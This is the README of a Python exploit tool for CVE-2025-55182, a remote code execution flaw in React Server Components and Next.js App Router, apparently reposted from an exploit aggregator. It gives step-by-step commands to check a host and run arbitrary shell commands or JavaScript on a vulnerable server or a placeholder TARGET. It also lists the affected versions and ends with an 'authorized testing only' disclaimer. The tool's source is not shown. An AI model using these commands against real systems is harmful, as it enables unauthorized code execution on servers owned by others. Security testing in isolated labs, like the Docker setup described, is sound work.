Share
## https://sploitus.com/exploit?id=1A5D1D0F-0545-5631-96CC-2A713E555F21
# CVE-2025-55182 - React Server Components RCE Exploit

Python CLI exploit for CVE-2025-55182, a critical RCE vulnerability in React Server Components via `react-server-dom-webpack`.

**Based on:** [ejpir/CVE-2025-55182-poc](https://github.com/ejpir/CVE-2025-55182-poc)

## Quick Start

### Docker Testing

```bash
# Build and run vulnerable container
docker build -t cve-2025-55182-vuln .
docker run -d -p 3002:3002 --name cve-2025-55182 cve-2025-55182-vuln
sleep 3

# Check vulnerability
python3 exploit.py CVE-2025-55182 --ip localhost --port 3002 --check

# Execute commands
python3 exploit.py CVE-2025-55182 --ip localhost --port 3002 --cmd "id"
python3 exploit.py CVE-2025-55182 --ip localhost --port 3002 --cmd "whoami"

# Cleanup
docker stop cve-2025-55182 && docker rm cve-2025-55182
```

## Usage

```bash
# Check vulnerability
python3 exploit.py CVE-2025-55182 --ip TARGET --port 3002 --check

# Execute command
python3 exploit.py CVE-2025-55182 --ip TARGET --port 3002 --cmd "COMMAND"

# Execute JavaScript
python3 exploit.py CVE-2025-55182 --url http://TARGET:3002 --code "Math.PI * 2"
```

## Affected Versions

- `react-server-dom-webpack`: 19.0.0, 19.1.0, 19.1.1, 19.2.0
- `Next.js`: 15.x, 16.x (App Router)

## Disclaimer

**FOR EDUCATIONAL AND AUTHORIZED TESTING PURPOSES ONLY**